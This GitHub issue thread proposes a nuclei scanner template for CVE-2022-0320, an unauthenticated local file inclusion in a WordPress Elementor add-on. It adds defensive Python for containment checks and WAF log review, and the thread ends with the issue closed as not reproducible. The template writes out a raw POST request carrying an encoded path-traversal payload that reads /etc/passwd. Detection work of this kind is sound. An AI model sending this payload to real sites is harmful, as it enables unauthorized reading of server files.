CVE-2022-0320
akincibor opened this issue
akincibor.eth commented
```yaml
id: CVE-2022-0320

info:
  name: Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI
  author: Akincibor
  severity: critical
  description: The plugin does not validate and sanitise some template data before using it in include statements, which could allow unauthenticated attackers to perform a Local File Inclusion attack and read arbitrary files on the server; this could also lead to RCE via user uploaded files or other LFI to RCE techniques.
  reference: https://wpscan.com/vulnerability/0d02b222-e672-4ac0-a1d4-d34e1ecf4a95
  tags: wp,rce,unauth,lfi,wordpress

requests:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Language: en-GB,en;q=0.5
        Accept-Encoding: gzip, deflate
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest
        Content-Length: 396
        Connection: close

        action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd&template_info%5Bname%5D=Post-Grid

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
```
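The template above exercises the `template_info[dir]` / `template_info[file_name]` parameters of the `load_more` AJAX action. As an added, defender-side example (not part of this template, and not the plugin's own code), the block below shows the two checks a practitioner would want: the containment check a plugin should apply before handing such values to an `include`, and a WAF / request-log review helper that decodes an `admin-ajax.php` form body and flags values that would escape the template directory. The template root `/srv/wp/plugin-templates`, the `lite`/`pro` allow-list and the convention that a template resolves to `<root>/<dir>/<file_name>.php` are assumptions made for the example, not the plugin's real layout; the sample bodies are constructed.

```python
"""Defender-side checks for the template_info path-traversal pattern.

Added example, not the plugin's or the nuclei template's own code. It assumes a
constructed template root and the hypothetical convention that a template
resolves to <root>/<dir>/<file_name>.php.
"""
import re
from pathlib import PurePosixPath
from urllib.parse import parse_qs

# Constructed root for the example; not the real plugin layout.
TEMPLATE_ROOT = PurePosixPath("/srv/wp/plugin-templates")
ALLOWED_DIRS = {"lite", "pro"}  # hypothetical allow-list of template sets
# A path component may only be an identifier: no dots, no separators, no NUL.
SAFE_PART = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]*")


def resolve_template_path(dir_name: str, file_name: str):
    """Return the include path when every component is an allow-listed
    identifier, otherwise None. This is the check a plugin should perform
    before passing user-controlled template_info values to include()."""
    if dir_name not in ALLOWED_DIRS:
        return None
    if file_name.startswith(("/", "\\")):  # absolute paths never allowed
        return None
    # Treat backslashes like slashes so "..\" cannot slip past on Windows hosts.
    parts = [p for p in file_name.replace("\\", "/").split("/") if p != ""]
    if not parts:
        return None
    for part in parts:
        if not SAFE_PART.fullmatch(part):  # rejects "..", ".", "%2e%2e", NUL, ...
            return None
    return TEMPLATE_ROOT.joinpath(dir_name, *parts[:-1], parts[-1] + ".php")


def inspect_ajax_body(body: str) -> dict:
    """WAF / request-log review: decode an admin-ajax.php form body and flag
    load_more calls whose template_info would escape the template directory."""
    params = parse_qs(body, keep_blank_values=True)

    def first(key: str) -> str:
        return params.get(key, [""])[0]

    report = {"action": first("action"), "suspicious": False, "reasons": []}
    if report["action"] != "load_more" or "template_info[file_name]" not in params:
        return report
    dir_name = first("template_info[dir]")
    file_name = first("template_info[file_name]")
    if ".." in file_name or file_name.startswith(("/", "\\")):
        report["reasons"].append("traversal sequence in template_info[file_name]")
    if resolve_template_path(dir_name, file_name) is None:
        report["reasons"].append(
            f"template_info dir={dir_name!r} file_name={file_name!r} fails containment check"
        )
    report["suspicious"] = bool(report["reasons"])
    return report


# Constructed sample bodies: the first mirrors the request shape in the template
# above, the second is what a legitimate "load more" call would look like.
TRAVERSAL_BODY = (
    "action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid"
    "&args=orderby%3Ddate%26order%3Ddesc&page=2&page_id=5512&widget_id=19f1b2c"
    "&nonce=7c9c8da06d&template_info%5Bdir%5D=lite"
    "&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
    "&template_info%5Bname%5D=Post-Grid"
)
BENIGN_BODY = (
    "action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid"
    "&page=2&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=Post-Grid"
    "&template_info%5Bname%5D=Post-Grid"
)

if __name__ == "__main__":
    for label, body in (("traversal", TRAVERSAL_BODY), ("benign", BENIGN_BODY)):
        print(label, inspect_ajax_body(body))
```

The containment check deliberately allow-lists characters rather than stripping `..`: a single URL-decode is all the form parser performs, so an encoded `%2e%2e` arrives as a literal and is rejected by the identifier rule instead of being normalised into a traversal. Run it against bodies captured by a WAF audit log or full-request logging, since the traversal lives in the POST body and never appears in a standard access log line.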
ertygiq commented
The .htaccess filename must be wrong. Looks like /etc/passwd was expected.
akincibor.eth commented
Yes you are right, updated.
Prince Chaddha commented
I am closing this Issue due to inactivity and the team not being able to reproduce the CVE in this template